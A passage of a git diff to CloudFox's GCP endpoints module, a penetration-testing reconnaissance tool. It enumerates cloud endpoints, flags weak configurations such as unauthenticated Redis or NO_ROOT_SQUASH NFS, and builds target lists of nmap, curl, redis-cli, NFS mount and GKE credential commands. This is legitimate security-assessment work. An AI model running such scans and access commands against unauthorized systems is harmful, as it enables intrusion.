getLoadBalancers(ctx context.Context, svc *compute.Ser ports = rule.PortRange } + tlsEnabled := rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https") + security := "" + if !tlsEnabled && ports != "443" { + security = "No TLS" + } + ep := Endpoint{ ProjectID: projectID, Name: rule.Name, - Type: "Global LoadBalancer", - Address: rule.IPAddress, + Type: "Global LB", + ExternalIP: rule.IPAddress, Protocol: rule.IPProtocol, Port: ports, Resource: extractResourceName(rule.Target), ResourceType: "GlobalForwardingRule", Region: "global", - TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), - RiskLevel: "Medium", - RiskReasons: []string{"External global load balancer"}, + TLSEnabled: tlsEnabled, IsExternal: true, + Security: security, } + m.addEndpoint(ep) + } + } + return nil + }) +} - if !ep.TLSEnabled && ports != "443" { - ep.RiskLevel = "High" - ep.RiskReasons = append(ep.RiskReasons, "No TLS/HTTPS") +// getVPNGateways retrieves VPN gateway external IPs +func (m *EndpointsModule) getVPNGateways(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Classic VPN Gateways + req := svc.TargetVpnGateways.AggregatedList(projectID) + _ = req.Pages(ctx, func(page *compute.TargetVpnGatewayAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.TargetVpnGateways == nil { + continue + } + for _, gw := range scopedList.TargetVpnGateways { + for i, ip := range gw.ForwardingRules { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s-ip%d", gw.Name, i), + Type: "VPN Gateway", + ExternalIP: extractResourceName(ip), + Protocol: "ESP/UDP", + Port: "500,4500", + ResourceType: "VPNGateway", + Region: extractRegionFromScope(region), + Status: gw.Status, + IsExternal: true, + Network: extractResourceName(gw.Network), + } + m.addEndpoint(ep) } + } + } + return nil + }) + // HA VPN Gateways + haReq := svc.VpnGateways.AggregatedList(projectID) + _ = haReq.Pages(ctx, func(page *compute.VpnGatewayAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.VpnGateways == nil { + continue + } + for _, gw := range scopedList.VpnGateways { + for _, iface := range gw.VpnInterfaces { + if iface.IpAddress != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s-if%d", gw.Name, iface.Id), + Type: "HA VPN Gateway", + ExternalIP: iface.IpAddress, + Protocol: "ESP/UDP", + Port: "500,4500", + ResourceType: "HAVPNGateway", + Region: extractRegionFromScope(region), + IsExternal: true, + Network: extractResourceName(gw.Network), + } + m.addEndpoint(ep) + } + } + } + } + return nil + }) +} + +// getCloudNAT retrieves Cloud NAT external IPs +func (m *EndpointsModule) getCloudNAT(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Routers.AggregatedList(projectID) + _ = req.Pages(ctx, func(page *compute.RouterAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.Routers == nil { + continue + } + for _, router := range scopedList.Routers { + for _, nat := range router.Nats { + for _, ip := range nat.NatIps { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s/%s", router.Name, nat.Name), + Type: "Cloud NAT", + ExternalIP: extractResourceName(ip), + Protocol: "TCP/UDP", + Port: "ALL", + ResourceType: "CloudNAT", + Region: extractRegionFromScope(region), + IsExternal: true, + Network: extractResourceName(router.Network), + } + m.addEndpoint(ep) + } + } + } + } + return nil + }) +} + +// getPrivateServiceConnect retrieves Private Service Connect endpoints +func (m *EndpointsModule) getPrivateServiceConnect(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Service Attachments (producer side) + saReq := svc.ServiceAttachments.AggregatedList(projectID) + _ = saReq.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.ServiceAttachments == nil { + continue + } + for _, sa := range scopedList.ServiceAttachments { + ep := Endpoint{ + ProjectID: projectID, + Name: sa.Name, + Type: "PSC Service", + Hostname: sa.SelfLink, + Protocol: "TCP", + Port: "ALL", + ResourceType: "ServiceAttachment", + Region: extractRegionFromScope(region), + IsExternal: false, + } m.addEndpoint(ep) } } return nil }) - if err != nil { - gcpinternal.HandleGCPError(err, logger, "endpoints", - fmt.Sprintf("Could not list global forwarding rules in project %s", projectID)) - } } -// getCloudRunServices retrieves Cloud Run services with public URLs +// getCloudRunServices retrieves Cloud Run services func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { runService, err := run.NewService(ctx) if err != nil { - gcpinternal.HandleGCPError(err, logger, "endpoints", - fmt.Sprintf("Could not create Cloud Run service in project %s", projectID)) return } @@ -555,28 +621,26 @@ func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID str for _, service := range resp.Items { if service.Status != nil && service.Status.Url != "" { + hostname := strings.TrimPrefix(service.Status.Url, "https://") + ep := Endpoint{ ProjectID: projectID, Name: service.Metadata.Name, Type: "Cloud Run", - FQDN: service.Status.Url, + Hostname: hostname, Protocol: "HTTPS", Port: "443", ResourceType: "CloudRun", TLSEnabled: true, - RiskLevel: "Medium", - RiskReasons: []string{"Public Cloud Run service"}, - IsExternal: true, // Cloud Run services are always external + IsExternal: true, } - // Extract region from metadata if service.Metadata != nil && service.Metadata.Labels != nil { if region, ok := service.Metadata.Labels["cloud.googleapis.com/location"]; ok { ep.Region = region } } - // Get service account if service.Spec != nil && service.Spec.Template != nil && service.Spec.Template.Spec != nil { ep.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName } @@ -586,165 +650,482 @@ func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID str } } -// analyzeFirewallRules analyzes firewall rules and builds port mapping for instances -func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { - req := svc.Firewalls.List(projectID) - err := req.Pages(ctx, func(page *compute.FirewallList) error { - for _, fw := range page.Items { - if fw.Direction != "INGRESS" { - continue +// getCloudFunctions retrieves Cloud Functions with HTTP triggers +func (m *EndpointsModule) getCloudFunctions(ctx context.Context, projectID string, logger internal.Logger) { + fs := functionsservice.New() + functions, err := fs.Functions(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud Functions in project %s", projectID)) + return + } + + for _, fn := range functions { + if fn.TriggerURL != "" { + hostname := strings.TrimPrefix(fn.TriggerURL, "https://") + security := "" + if fn.IsPublic { + security = "Public (No Auth)" } - networkName := extractResourceName(fw.Network) + ep := Endpoint{ + ProjectID: projectID, + Name: fn.Name, + Type: "Cloud Function", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "CloudFunction", + Region: fn.Region, + Status: fn.State, + ServiceAccount: fn.ServiceAccount, + TLSEnabled: true, + IsExternal: true, + Security: security, + } + m.addEndpoint(ep) + } + } +} - // Collect all allowed ports for this rule - var rulePorts []string - for _, allowed := range fw.Allowed { - if len(allowed.Ports) == 0 { - // No specific ports means all ports for this protocol - rulePorts = append(rulePorts, "ALL") - } else { - rulePorts = append(rulePorts, allowed.Ports...) - } +// getAppEngineServices retrieves App Engine services +func (m *EndpointsModule) getAppEngineServices(ctx context.Context, projectID string, logger internal.Logger) { + aeService, err := appengine.NewService(ctx) + if err != nil { + return + } + + // Get app info + app, err := aeService.Apps.Get(projectID).Do() + if err != nil { + // App Engine not enabled or no app + return + } + + // List services + servicesResp, err := aeService.Apps.Services.List(projectID).Do() + if err != nil { + return + } + + for _, svc := range servicesResp.Services { + // Default service hostname + hostname := fmt.Sprintf("%s.appspot.com", projectID) + if svc.Id != "default" { + hostname = fmt.Sprintf("%s-dot-%s.appspot.com", svc.Id, projectID) + } + + ep := Endpoint{ + ProjectID: projectID, + Name: svc.Id, + Type: "App Engine", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "AppEngine", + Region: app.LocationId, + TLSEnabled: true, + IsExternal: true, + } + m.addEndpoint(ep) + } +} + +// getGKEClusters retrieves GKE cluster API endpoints +func (m *EndpointsModule) getGKEClusters(ctx context.Context, projectID string, logger internal.Logger) { + gs := gkeservice.New() + clusters, _, err := gs.Clusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list GKE clusters in project %s", projectID)) + return + } + + for _, cluster := range clusters { + if cluster.Endpoint != "" { + isExternal := !cluster.PrivateCluster + security := "" + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + security = "Public API (No Restrictions)" + } else if cluster.MasterAuthorizedOnly { + security = "Authorized Networks Only" } - // Build firewall port map for internal IP port determination - m.mu.Lock() - if len(fw.TargetTags) == 0 { - // Rule applies to all instances in network - m.firewallPortMap[networkName] = append(m.firewallPortMap[networkName], rulePorts...) + ep := Endpoint{ + ProjectID: projectID, + Name: cluster.Name, + Type: "GKE API", + Protocol: "HTTPS", + Port: "443", + ResourceType: "GKECluster", + Region: cluster.Location, + Status: cluster.Status, + TLSEnabled: true, + IsExternal: isExternal, + Network: cluster.Network, + Security: security, + } + if isExternal { + ep.ExternalIP = cluster.Endpoint } else { - // Rule applies to instances with specific tags - for _, tag := range fw.TargetTags { - key := fmt.Sprintf("%s:%s", networkName, tag) - m.firewallPortMap[key] = append(m.firewallPortMap[key], rulePorts...) - } + ep.InternalIP = cluster.Endpoint } - m.mu.Unlock() + m.addEndpoint(ep) + } + } +} - // Check if rule allows ingress from 0.0.0.0/0 (public access) - isPublic := false - for _, sr := range fw.SourceRanges { - if sr == "0.0.0.0/0" { - isPublic = true +// getCloudSQLInstances retrieves Cloud SQL instances +func (m *EndpointsModule) getCloudSQLInstances(ctx context.Context, projectID string, logger internal.Logger) { + cs := cloudsqlservice.New() + instances, err := cs.Instances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances { + port := "3306" // MySQL default + if strings.Contains(instance.DatabaseVersion, "POSTGRES") { + port = "5432" + } else if strings.Contains(instance.DatabaseVersion, "SQLSERVER") { + port = "1433" + } + + // Public IP + if instance.PublicIP != "" { + security := "" + if !instance.RequireSSL { + security = "SSL Not Required" + } + for _, an := range instance.AuthorizedNetworks { + if an.IsPublic { + security = "Open to 0.0.0.0/0" break } } - if isPublic { - fwRule := FirewallRule{ - ProjectID: projectID, - RuleName: fw.Name, - Network: networkName, - Direction: fw.Direction, - SourceRanges: fw.SourceRanges, - TargetTags: fw.TargetTags, - Ports: rulePorts, - } + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Cloud SQL", + ExternalIP: instance.PublicIP, + InternalIP: instance.PrivateIP, + Protocol: "TCP", + Port: port, + ResourceType: "CloudSQL", + Region: instance.Region, + Status: instance.State, + TLSEnabled: instance.RequireSSL, + IsExternal: true, + Security: security, + } + m.addEndpoint(ep) + } else if instance.PrivateIP != "" { + // Private IP only + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Cloud SQL", + InternalIP: instance.PrivateIP, + Protocol: "TCP", + Port: port, + ResourceType: "CloudSQL", + Region: instance.Region, + Status: instance.State, + TLSEnabled: instance.RequireSSL, + IsExternal: false, + } + m.addEndpoint(ep) + } + } +} - // Get protocol - if len(fw.Allowed) > 0 { - fwRule.Protocol = fw.Allowed[0].IPProtocol - } +// getMemorystoreRedis retrieves Memorystore Redis instances +func (m *EndpointsModule) getMemorystoreRedis(ctx context.Context, projectID string, logger internal.Logger) { + ms := memorystoreservice.New() + instances, err := ms.ListRedisInstances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Memorystore Redis instances in project %s", projectID)) + return + } - // Classify risk - fwRule.RiskLevel, fwRule.RiskReasons = m.classifyFirewallRisk(fwRule) + for _, instance := range instances { + if instance.Host != "" { + security := "" + if !instance.AuthEnabled { + security = "No Auth" + } + if instance.TransitEncryption == "DISABLED" { + if security != "" { + security += ", " + } + security += "No TLS" + } - m.mu.Lock() - m.FirewallRules = append(m.FirewallRules, fwRule) - m.mu.Unlock() + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Redis", + InternalIP: instance.Host, + Protocol: "TCP", + Port: fmt.Sprintf("%d", instance.Port), + ResourceType: "Memorystore", + Region: instance.Location, + Status: instance.State, + TLSEnabled: instance.TransitEncryption != "DISABLED", + IsExternal: false, + Network: extractResourceName(instance.AuthorizedNetwork), + Security: security, } + m.addEndpoint(ep) } - return nil - }) + } +} + +// getFilestoreInstances retrieves Filestore NFS instances +func (m *EndpointsModule) getFilestoreInstances(ctx context.Context, projectID string, logger internal.Logger) { + fs := filestoreservice.New() + instances, err := fs.ListInstances(projectID) if err != nil { gcpinternal.HandleGCPError(err, logger, "endpoints", - fmt.Sprintf("Could not list firewall rules in project %s", projectID)) + fmt.Sprintf("Could not list Filestore instances in project %s", projectID)) + return } -} -// addEndpoint adds an endpoint thread-safely to appropriate list and to loot -func (m *EndpointsModule) addEndpoint(ep Endpoint) { - m.mu.Lock() - if ep.IsExternal { - m.ExternalEndpoints = append(m.ExternalEndpoints, ep) - } else { - m.InternalEndpoints = append(m.InternalEndpoints, ep) + for _, instance := range instances { + for _, ip := range instance.IPAddresses { + security := "" + for _, share := range instance.Shares { + for _, opt := range share.NfsExportOptions { + if opt.SquashMode == "NO_ROOT_SQUASH" { + security = "NO_ROOT_SQUASH" + break + } + } + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Filestore NFS", + InternalIP: ip, + Protocol: "NFS", + Port: "2049", + ResourceType: "Filestore", + Region: instance.Location, + Status: instance.State, + IsExternal: false, + Network: instance.Network, + Security: security, + } + m.addEndpoint(ep) + } } - m.addEndpointToLoot(ep) - m.mu.Unlock() } -// classifyInstanceRisk determines the risk level of an exposed instance -func (m *EndpointsModule) classifyInstanceRisk(instance *compute.Instance) (string, []string) { - var reasons []string - score := 0 - - reasons = append(reasons, "Has external IP") - score += 1 +// getComposerEnvironments retrieves Cloud Composer Airflow web UI URLs +func (m *EndpointsModule) getComposerEnvironments(ctx context.Context, projectID string, logger internal.Logger) { + cs := composerservice.New() + environments, err := cs.ListEnvironments(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Composer environments in project %s", projectID)) + return + } - for _, sa := range instance.ServiceAccounts { - if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { - reasons = append(reasons, "Uses default Compute Engine SA") - score += 2 - } + for _, env := range environments { + if env.AirflowURI != "" { + hostname := strings.TrimPrefix(env.AirflowURI, "https://") + security := "" + if !env.PrivateEnvironment { + security = "Public Web UI" + } + for _, ip := range env.WebServerAllowedIPs { + if ip == "0.0.0.0/0" { + security = "Open to 0.0.0.0/0" + break + } + } - for _, scope := range sa.Scopes { - if scope == "https://www.googleapis.com/auth/cloud-platform" { - reasons = append(reasons, "Has cloud-platform scope (full access)") - score += 3 + ep := Endpoint{ + ProjectID: projectID, + Name: env.Name, + Type: "Composer Airflow", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "Composer", + Region: env.Location, + Status: env.State, + ServiceAccount: env.ServiceAccount, + TLSEnabled: true, + IsExternal: !env.PrivateEnvironment, + Network: extractResourceName(env.Network), + Security: security, } + m.addEndpoint(ep) } } +} + +// getDataprocClusters retrieves Dataproc cluster master/worker IPs +func (m *EndpointsModule) getDataprocClusters(ctx context.Context, projectID string, logger internal.Logger) { + ds := dataprocservice.New() + clusters, err := ds.ListClusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Dataproc clusters in project %s", projectID)) + return + } + + for _, cluster := range clusters { + // Master nodes - these are the main SSH/Spark/HDFS entry points + security := "" + if !cluster.InternalIPOnly { + security = "External IPs Enabled" + } - if score >= 4 { - return "Critical", reasons - } else if score >= 2 { - return "High", reasons + ep := Endpoint{ + ProjectID: projectID, + Name: cluster.Name + "-master", + Type: "Dataproc Master", + Protocol: "TCP", + Port: "22,8088,9870,8080", + ResourceType: "DataprocCluster", + Region: cluster.Region, + Status: cluster.State, + ServiceAccount: cluster.ServiceAccount, + IsExternal: !cluster.InternalIPOnly, + Network: cluster.Network, + Security: security, + } + m.addEndpoint(ep) } - return "Medium", reasons } -// classifyFirewallRisk determines the risk level of a public firewall rule -func (m *EndpointsModule) classifyFirewallRisk(rule FirewallRule) (string, []string) { - var reasons []string - score := 0 - - reasons = append(reasons, "Allows traffic from 0.0.0.0/0") - score += 1 - - dangerousPorts := map[string]string{ - "22": "SSH", - "3389": "RDP", - "3306": "MySQL", - "5432": "PostgreSQL", - "27017": "MongoDB", - "6379": "Redis", - "9200": "Elasticsearch", +// getNotebookInstances retrieves Vertex AI Notebook instances +func (m *EndpointsModule) getNotebookInstances(ctx context.Context, projectID string, logger internal.Logger) { + ns := notebooksservice.New() + instances, err := ns.ListInstances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Notebook instances in project %s", projectID)) + return } - for _, port := range rule.Ports { - if name, ok := dangerousPorts[port]; ok { - reasons = append(reasons, fmt.Sprintf("Exposes %s (port %s)", name, port)) - score += 3 - } - if strings.Contains(port, "-") { - reasons = append(reasons, fmt.Sprintf("Wide port range: %s", port)) - score += 2 + for _, instance := range instances { + if instance.ProxyUri != "" { + hostname := strings.TrimPrefix(instance.ProxyUri, "https://") + security := "" + if !instance.NoPublicIP { + security = "Public IP Enabled" + } + if instance.NoProxyAccess { + security = "Proxy Access Disabled" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Vertex AI Notebook", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "Notebook", + Region: instance.Location, + Status: instance.State, + ServiceAccount: instance.ServiceAccount, + TLSEnabled: true, + IsExternal: !instance.NoPublicIP, + Network: instance.Network, + Security: security, + } + m.addEndpoint(ep) } } +} - if len(rule.TargetTags) == 0 { - reasons = append(reasons, "No target tags (applies to all instances)") - score += 2 +// getPubSubPushEndpoints retrieves Pub/Sub push subscription endpoints +func (m *EndpointsModule) getPubSubPushEndpoints(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subscriptions, err := ps.Subscriptions(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Pub/Sub subscriptions in project %s", projectID)) + return } - if score >= 5 { - return "Critical", reasons - } else if score >= 3 { - return "High", reasons + for _, sub := range subscriptions { + if sub.PushEndpoint != "" { + hostname := sub.PushEndpoint + hostname = strings.TrimPrefix(hostname, "https://") + hostname = strings.TrimPrefix(hostname, "http://") + if idx := strings.Index(hostname, "/"); idx != -1 { + hostname = hostname[:idx] + } + + ep := Endpoint{ + ProjectID: projectID, + Name: sub.Name, + Type: "Pub/Sub Push", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + Resource: sub.Topic, + ResourceType: "PubSubSubscription", + ServiceAccount: sub.PushServiceAccount, + TLSEnabled: strings.HasPrefix(sub.PushEndpoint, "https://"), + IsExternal: true, + } + m.addEndpoint(ep) + } } - return "Medium", reasons +} + +// analyzeFirewallRules analyzes firewall rules and builds port mapping +func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Firewalls.List(projectID) + _ = req.Pages(ctx, func(page *compute.FirewallList) error { + for _, fw := range page.Items { + if fw.Direction != "INGRESS" { + continue + } + + networkName := extractResourceName(fw.Network) + + var rulePorts []string + for _, allowed := range fw.Allowed { + if len(allowed.Ports) == 0 { + rulePorts = append(rulePorts, "ALL") + } else { + rulePorts = append(rulePorts, allowed.Ports...) + } + } + + m.mu.Lock() + if len(fw.TargetTags) == 0 { + m.firewallPortMap[networkName] = append(m.firewallPortMap[networkName], rulePorts...) + } else { + for _, tag := range fw.TargetTags { + key := fmt.Sprintf("%s:%s", networkName, tag) + m.firewallPortMap[key] = append(m.firewallPortMap[key], rulePorts...) + } + } + m.mu.Unlock() + } + return nil + }) +} + +// addEndpoint adds an endpoint thread-safely +func (m *EndpointsModule) addEndpoint(ep Endpoint) { + m.mu.Lock() + m.Endpoints = append(m.Endpoints, ep) + m.addEndpointToLoot(ep) + m.mu.Unlock() } // ------------------------------ @@ -762,7 +1143,6 @@ func extractResourceName(url string) string { } func extractRegionFromScope(scope string) string { - // Format: regions/us-central1 parts := strings.Split(scope, "/") if len(parts) >= 2 { return parts[len(parts)-1] @@ -771,7 +1151,6 @@ func extractRegionFromScope(scope string) string { } func extractZoneFromScope(scope string) string { - // Format: zones/us-central1-a parts := strings.Split(scope, "/") if len(parts) >= 2 { return parts[len(parts)-1] @@ -779,110 +1158,110 @@ func extractZoneFromScope(scope string) string { return scope } -// getIPAndHostname extracts IP address and hostname from an endpoint -// Returns "-" for fields that are not applicable -func getIPAndHostname(ep Endpoint) (ipAddr string, hostname string) { - ipAddr = "-" - hostname = "-" - - // If we have an IP address (Address field) - if ep.Address != "" { - ipAddr = ep.Address - } - - // If we have a FQDN/hostname - if ep.FQDN != "" { - // Strip protocol prefix - host := ep.FQDN - host = strings.TrimPrefix(host, "https://") - host = strings.TrimPrefix(host, "http://") - // Remove any trailing path - if idx := strings.Index(host, "/"); idx != -1 { - host = host[:idx] - } - hostname = host - } - - return ipAddr, hostname -} - // ------------------------------ // Loot File Management // ------------------------------ func (m *EndpointsModule) initializeLootFiles() { - m.LootMap["endpoints-external-commands"] = &internal.LootFile{ - Name: "endpoints-external-commands", - Contents: "# External Endpoints Scan Commands\n" + - "# Generated by CloudFox\n" + - "# Use these commands for authorized penetration testing of internet-facing resources\n\n", - } - m.LootMap["endpoints-internal-commands"] = &internal.LootFile{ - Name: "endpoints-internal-commands", - Contents: "# Internal Endpoints Scan Commands\n" + + m.LootMap["endpoints-commands"] = &internal.LootFile{ + Name: "endpoints-commands", + Contents: "# Endpoint Scan Commands\n" + "# Generated by CloudFox\n" + - "# Use these commands for authorized internal network penetration testing\n" + - "# Note: These targets require internal network access or VPN connection\n\n", + "# Use these commands for authorized penetration testing\n\n", } } func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { - target := ep.Address + // Determine best target for scanning + target := ep.ExternalIP if target == "" { - target = ep.FQDN + target = ep.InternalIP + } + if target == "" { + target = ep.Hostname } if target == "" { return } - // Strip protocol prefix for nmap (needs just hostname/IP) - hostname := target - hostname = strings.TrimPrefix(hostname, "https://") - hostname = strings.TrimPrefix(hostname, "http://") - // Remove any trailing path - if idx := strings.Index(hostname, "/"); idx != -1 { - hostname = hostname[:idx] + exposure := "INTERNAL" + if ep.IsExternal { + exposure = "EXTERNAL" } - // Build nmap command based on endpoint type and port info - var nmapCmd string - switch { - case ep.Port == "ALL" || ep.Port == "": - // Unknown ports - scan all common ports (or full range for internal) - if ep.IsExternal { - nmapCmd = fmt.Sprintf("nmap -sV -Pn %s", hostname) - } else { - // For internal, scan all ports since we don't know what's open - nmapCmd = fmt.Sprintf("nmap -sV -Pn -p- %s", hostname) - } - case strings.Contains(ep.Port, ","): - nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) - case strings.Contains(ep.Port, "-"): - nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) - default: - nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) - } + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + "# [%s] %s: %s (%s)\n"+ + "# Project: %s | Region: %s | Network: %s\n", + exposure, ep.Type, ep.Name, ep.ResourceType, + ep.ProjectID, ep.Region, ep.Network, + ) - // Select appropriate loot file - lootKey := "endpoints-external-commands" - if !ep.IsExternal { - lootKey = "endpoints-internal-commands" + if ep.Security != "" { + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf("# Security: %s\n", ep.Security) } - m.LootMap[lootKey].Contents += fmt.Sprintf( - "# %s: %s (%s)\n"+ - "# Project: %s | Region: %s | Network: %s\n"+ - "%s\n\n", - ep.Type, ep.Name, ep.ResourceType, - ep.ProjectID, ep.Region, ep.Network, - nmapCmd, - ) + // Generate appropriate commands based on type + switch ep.Type { + case "Cloud Run", "Cloud Function", "Composer Airflow", "App Engine", "Vertex AI Notebook": + if ep.Hostname != "" { + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname) + } + case "GKE API": + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + "# Get cluster credentials:\n"+ + "gcloud container clusters get-credentials %s --region=%s --project=%s\n"+ + "kubectl cluster-info\n\n", + ep.Name, ep.Region, ep.ProjectID) + case "Cloud SQL": + protocol := "mysql" + if strings.Contains(ep.Port, "5432") { + protocol = "psql" + } else if strings.Contains(ep.Port, "1433") { + protocol = "sqlcmd" + } + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + "# Connect to database:\n"+ + "# %s -h %s -P %s -u USERNAME\n"+ + "nmap -sV -Pn -p %s %s\n\n", + protocol, target, ep.Port, ep.Port, target) + case "Redis": + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + "redis-cli -h %s -p %s\n"+ + "nmap -sV -Pn -p %s %s\n\n", + target, ep.Port, ep.Port, target) + case "Filestore NFS": + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + "showmount -e %s\n"+ + "sudo mount -t nfs %s:/ /mnt/\n\n", + target, target) + case "Dataproc Master": + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + "# SSH to master node:\n"+ + "gcloud compute ssh %s --project=%s --zone=\n"+ + "# Web UIs: YARN (8088), HDFS (9870), Spark (8080)\n\n", + strings.TrimSuffix(ep.Name, "-master"), ep.ProjectID) + case "VPN Gateway", "HA VPN Gateway": + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + "# VPN Gateway IP: %s\n"+ + "# Ports: 500/UDP (IKE), 4500/UDP (NAT-T), ESP\n"+ + "nmap -sU -Pn -p 500,4500 %s\n\n", + target, target) + case "Pub/Sub Push": + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + "# Push endpoint (receives messages from Pub/Sub):\n"+ + "curl -v https://%s\n\n", + ep.Hostname) + default: + var nmapCmd string + switch { + case ep.Port == "ALL" || ep.Port == "": + nmapCmd = fmt.Sprintf("nmap -sV -Pn %s", target) + default: + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, target) + } + m.LootMap["endpoints-commands"].Contents += nmapCmd + "\n\n" - // Add HTTP/HTTPS test for web-facing endpoints - if ep.Type == "LoadBalancer" || ep.Type == "Global LoadBalancer" || ep.Type == "Cloud Run" { if ep.TLSEnabled || ep.Port == "443" { - m.LootMap[lootKey].Contents += fmt.Sprintf("curl -vk https://%s/\n\n", hostname) - } else { - m.LootMap[lootKey].Contents += fmt.Sprintf("curl -v http://%s/\n\n", hostname) + m.LootMap["endpoints-commands"].Contents += fmt.Sprintf("curl -vk https://%s/\n\n", target) } } } @@ -891,79 +1270,78 @@ func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { // Output Generation // ------------------------------ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Status column shows operational state: RUNNING, STOPPED, IN_USE, RESERVED, etc. header := []string{ "Project ID", "Project Name", "Name", "Type", - "IP Address", + "Exposure", + "External IP", + "Internal IP", "Hostname", "Protocol", "Port", "Region", "Network", + "Security", "Status", } - // External endpoints table - var externalBody [][]string - for _, ep := range m.ExternalEndpoints { - ipAddr, hostname := getIPAndHostname(ep) - externalBody = append(externalBody, []string{ - ep.ProjectID, - m.GetProjectName(ep.ProjectID), - ep.Name, - ep.Type, - ipAddr, - hostname, - ep.Protocol, - ep.Port, - ep.Region, - ep.Network, - ep.Status, - }) - } + var body [][]string + for _, ep := range m.Endpoints { + exposure := "Internal" + if ep.IsExternal { + exposure = "External" + } + + externalIP := ep.ExternalIP + if externalIP == "" { + externalIP = "-" + } + + internalIP := ep.InternalIP + if internalIP == "" { + internalIP = "-" + } + + hostname := ep.Hostname + if hostname == "" { + hostname = "-" + } + + security := ep.Security + if security == "" { + security = "-" + } + + status := ep.Status + if status == "" { + status = "-" + } + + network := ep.Network + if network == "" { + network = "-" + } - // Internal endpoints table - var internalBody [][]string - for _, ep := range m.InternalEndpoints { - ipAddr, hostname := getIPAndHostname(ep) - internalBody = append(internalBody, []string{ + body = append(body, []string{ ep.ProjectID, m.GetProjectName(ep.ProjectID), ep.Name, ep.Type, - ipAddr, + exposure, + externalIP, + internalIP, hostname, ep.Protocol, ep.Port, ep.Region, - ep.Network, - ep.Status, + network, + security, + status, }) } - // Firewall rules table (public 0.0.0.0/0 rules only) - var fwBody [][]string - if len(m.FirewallRules) > 0 { - for _, fw := range m.FirewallRules { - tags := strings.Join(fw.TargetTags, ",") - if tags == "" { - tags = "ALL" - } - fwBody = append(fwBody, []string{ - fw.ProjectID, - m.GetProjectName(fw.ProjectID), - fw.RuleName, - fw.Network, - fw.Protocol, - strings.Join(fw.Ports, ","), - tags, - }) - } - } - // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -972,44 +1350,13 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge } } - // Build tables - var tables []internal.TableFile - - if len(externalBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "endpoints-external", - Header: header, - Body: externalBody, - }) - } - - if len(internalBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "endpoints-internal", - Header: header, - Body: internalBody, - }) - } - - if len(fwBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "endpoints-firewall", - Header: []string{ - "Project ID", - "Project Name", - "Rule", - "Network", - "Protocol", - "Ports", - "Target Tags", - }, - Body: 